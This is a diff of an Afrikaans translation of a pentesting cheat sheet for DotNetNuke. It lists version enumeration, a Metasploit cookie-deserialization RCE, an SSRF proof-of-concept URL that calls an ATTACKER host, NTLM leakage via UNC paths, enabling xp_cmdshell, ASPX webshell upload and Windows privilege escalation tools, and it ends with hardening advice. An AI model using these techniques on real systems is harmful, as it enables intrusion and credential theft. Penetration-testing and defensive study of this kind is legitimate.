Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d

src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

@@ -4,37 +4,92 @@
 
 ## DotNetNuke (DNN)
 
-As jy as **administrateur** in DNN inlog, is dit maklik om RCE te verkry.
+As jy as **administrateur** in DNN inlog, is dit maklik om **RCE** te verkry, maar 'n aantal *onaangetekende* en *post-auth* tegnieke is in die afgelope paar jaar gepubliseer. Die volgende spiekkaart versamel die nuttigste primitiewe vir beide offensiewe en defensiewe werk.
 
-## RCE
+---
+## Weergawe & Omgewing Enumerasie
 
-### Via SQL
+* Kontroleer die *X-DNN* HTTP antwoordkop – dit openbaar gewoonlik die presiese platformweergawe.
+* Die installasiewizard lek die weergawe in `/Install/Install.aspx?mode=install` (toeganklik op baie ou installasies).
+* `/API/PersonaBar/GetStatus` (9.x) gee 'n JSON blob wat `"dnnVersion"` bevat vir lae-privilege gebruikers.
+* Tipiese koekies wat jy op 'n lewende instansie sal sien:
+* `.DOTNETNUKE` – ASP.NET vorms verifikasieticket.
+* `DNNPersonalization` – bevat XML/serialiseerde gebruikersprofieldata (ou weergawe – sien RCE hieronder).
 
-'n SQL-konsol is beskikbaar onder die **`Settings`** bladsy waar jy **`xp_cmdshell`** kan aktiveer en **bedryfstelselskommando's** kan uitvoer.
+---
+## Onaangetekende Exploitatie
 
-Gebruik hierdie lyne om **`xp_cmdshell`** te aktiveer:
-```sql
-EXEC sp_configure 'show advanced options', '1'
-RECONFIGURE
-EXEC sp_configure 'xp_cmdshell', '1'
-RECONFIGURE
+### 1. Koekie Deserialisering RCE  (CVE-2017-9822 & opvolgings)
+*Geaffekteerde weergawes ≤ 9.3.0-RC*
+
+`DNNPersonalization` word op elke versoek gedeserialiseer wanneer die ingeboude 404 hanteraar geaktiveer is. Gemaakte XML kan dus lei tot arbitrêre gadgetkettings en kode-uitvoering.
 ```
-En druk **"Run Script"** om daardie sQL sinne te loop.
-
-Gebruik dan iets soos die volgende om OS-opdragte te loop:
-```sql
-xp_cmdshell 'whoami'
+msf> use exploit/windows/http/dnn_cookie_deserialization_rce
+msf> set RHOSTS <target>
+msf> set LHOST  <attacker_ip>
+msf> run
 ```
-### Via ASP webshell
+Die module kies outomaties die regte pad vir gepatchte maar steeds kwesbare weergawes (CVE-2018-15811/15812/18325/18326). Exploitatie werk **sonder verifikasie** op 7.x–9.1.x en met 'n *geverifieerde* lae-regte rekening op 9.2.x+.
 
-In `Settings -> Security -> More -> More Security Settings` kan jy **nuwe toegelate uitbreidings** byvoeg onder `Allowable File Extensions`, en dan op die `Save` knoppie klik.
+### 2. Server-Side Request Forgery  (CVE-2025-32372)
+*Geaffekteerde weergawes < 9.13.8  –  Patch vrygestel April 2025*
 
-Voeg **`asp`** of **`aspx`** by en laai dan in **`/admin/file-management`** 'n **asp webshell** op genaamd `shell.asp` byvoorbeeld.
+'n Bypass van die ouer `DnnImageHandler` regstelling stel 'n aanvaller in staat om die bediener te dwing om **arbitraire GET versoeke** uit te reik (semi-blind SSRF). Praktiese impakte:
 
-Gaan dan na **`/Portals/0/shell.asp`** om toegang tot jou webshell te verkry.
+* Interne poortskandering / metadata diensontdekking in wolkontplooiings.
+* Bereik gasheer wat andersins deur die Internet geblokkeer is.
 
-### Privilege Escalation
+Bewys-van-konsep (vervang `TARGET` & `ATTACKER`):
+```
+https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
+```
+Die versoek word in die agtergrond geaktiveer; monitor jou luisteraar vir terugroepe.
 
-Jy kan **privileges verhoog** met behulp van die **Potatoes** of **PrintSpoofer** byvoorbeeld.
+### 3. NTLM Hash Blootstelling via UNC Oorleiding  (CVE-2025-52488)
+*Geaffekteerde weergawes 6.0.0 – 9.x (< 10.0.1)*
 
+Spesiaal saamgestelde inhoud kan DNN laat probeer om 'n hulpbron te verkry met 'n **UNC pad** soos `\\attacker\share\img.png`. Windows sal gelukkig NTLM-onderhandeling uitvoer, wat die bediener-rekening hashes aan die aanvaller blootstel. Opgradeer na **10.0.1** of deaktiveer uitgaande SMB by die firewall.
+
+### 4. IP Filter Omseiling  (CVE-2025-52487)
+As administrateurs op *Host/IP Filters* staatmaak vir admin portaal beskerming, wees bewus dat weergawes voor **10.0.1** omseil kan word deur `X-Forwarded-For` in 'n omgekeerde proxy-scenario te manipuleer.
+
+---
+## Post-Authentisering na RCE
+
+### Via SQL konsole
+Onder **`Settings → SQL`** 'n ingeboude vrae venster laat uitvoering teen die webwerf databasis toe. Op Microsoft SQL Server kan jy **`xp_cmdshell`** aktiveer en opdragte genereer:
+```sql
+EXEC sp_configure 'show advanced options', 1;
+RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell', 1;
+RECONFIGURE;
+GO
+xp_cmdshell 'whoami';
+```
+### Via ASPX webshell oplaai
+1. Gaan na **`Settings → Security → More → More Security Settings`**.
+2. Voeg `aspx` (of `asp`) by **Allowable File Extensions** en **Save**.
+3. Blaai na **`/admin/file-management`** en laai `shell.aspx` op.
+4. Trigger dit by **`/Portals/0/shell.aspx`**.
+
+---
+## Privilege Escalation op Windows
+Sodra kode-uitvoering bereik is as **IIS AppPool\<Site>**, geld algemene Windows privilege-escalation tegnieke. As die boks kwesbaar is, kan jy benut:
+
+* **PrintSpoofer** / **SpoolFool** om *SeImpersonatePrivilege* te misbruik.
+* **Juicy/Sharp Potatoes** om *Service Accounts* te ontsnap.
+
+---
+## Versterking Aanbevelings (Blou Span)
+
+* **Opgradeer** na ten minste **9.13.9** (herstel SSRF omseiling) of verkieslik **10.0.1** (IP-filter & NTLM probleme).
+* Verwyder oorblywende **`InstallWizard.aspx*`** lêers na installasie.
+* Deaktiveer uitgaande SMB (poorte 445/139) egress.
+* Handhaaf sterk *Host Filters* op die rand proxy eerder as binne DNN.
+* Blokkeer toegang tot `/API/RemoteContentProxy` as dit nie gebruik word.
+
+## Verwysings
+
+* Metasploit `dnn_cookie_deserialization_rce` module dokumentasie – praktiese ongemagtigde RCE besonderhede (GitHub).
+* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF omseiling & patch inligting.
 {{#include ../../banners/hacktricks-training.md}}